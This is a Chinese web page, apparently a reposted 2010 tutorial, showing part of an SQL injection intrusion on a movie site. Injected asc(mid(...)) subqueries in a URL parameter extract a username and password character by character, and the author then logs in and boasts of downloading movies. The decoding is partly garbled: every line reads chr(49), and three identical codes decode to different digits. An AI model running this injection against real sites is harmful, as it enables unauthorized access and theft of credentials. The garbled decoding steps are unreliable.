济宁天气预报
济宁市人力资源和社会保障局
济宁人事考试单位代码
济宁市安全教育平台
济宁违章查询
济宁住房公积金查询
济宁科技网 济宁培训班 济宁银行网上银行 济宁教育网 历史故事 家庭教育 济宁市地图 济宁房产 济宁教育网 济宁人事考试信息网 济宁新闻网
币圈最新消息 济宁信息港
浏览器之家 济宁汽车 睡前小故事
下载吧 股票书籍 花花草草
百应百科 照片恢复 学习通
红警之家 睡前小故事 马伊琍
手机照片恢复 手机数据恢复

SQL注入网站入侵实例演示(2)

时间:2010-09-09 18:30来源:未知 www.yunhepan.com

http://www.movie.com/movie.ASP?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500)

呵呵,又返回一部影片,搜索一下,影片ID为1104,即asc(mid(UserID,1,1))=104

同样方法,得出:

asc(mid(UserID,2,1))=117

asc(mid(UserID,3,1))=97

asc(mid(UserID,4,1))=106

asc(mid(UserID,5,1))=105

asc(mid(UserID,6,1))=101

因为len(UserID)=6,所以算到第6位就行了,查asc对应表(会编程的可以写几句话算出来),chr(104)=h,chr(117)=u,chr(97)=a,chr(106)=j,chr(105)=i,chr(101)=e

连起来,用户名就是huajie

8.同样的方法破解密码

asc(mid(Password,1,1))=49 => chr(49)=1

asc(mid(Password,2,1))=57 => chr(49)=9

asc(mid(Password,3,1))=55 => chr(49)=7

asc(mid(Password,4,1))=56 => chr(49)=8

asc(mid(Password,5,1))=48 => chr(49)=0

asc(mid(Password,6,1))=55 => chr(49)=7

asc(mid(Password,7,1))=55 => chr(49)=1

asc(mid(Password,8,1))=55 => chr(49)=2

拼起来:19780712,哈哈,又是用生日做密码的!

接下来,输入用户名和密码,登录系统,成功!猜表名列表之前用了30分钟,破解用了15分钟,45分钟搞掂了一个站。接下来做什么?当然是先Down几G的电影下来再说了。

上述的相关内容就是对SQL注入网站入侵实例的描述,希望会给你带来一些帮助在此方面。

相关阅读
  • 调查显示大企业中只有33%未被黑客入侵
  • 简述主要的黑客入侵途径及应对方法
  • 通过交换机防范蠕虫病毒入侵
  • 黑客攻击和入侵的八大常用手段有哪些?
  • 黑客捕捉技术之网络入侵追踪方法
  • 黑客攻击技术 WEB网站入侵的全过程讲述
  • 实例阐述何为DNS欺骗
  • 实例讲述网络社会工程学

  • 上一篇:安全升级网站,实施木马攻击
    下一篇:微软正在调查IE浏览器CSS bug

    济宁运河畔网版权与免责声明:

    ①凡本网来源于注明来“源于:运河畔或www.yunhepan.com”版权均属运河畔网所有,其他媒体可以转载,且需注明“来源运河畔网”
    ② 凡本网注明“来源:XXX(非济宁运河畔,济宁信息港)”的作品,均转载自其它媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
    ③ 如因作品内容、版权和其它问题需要同本网联系的,请在30日内进行。

    • 全网热点
    • 健康
    • 教育
    • 新闻
    • 美食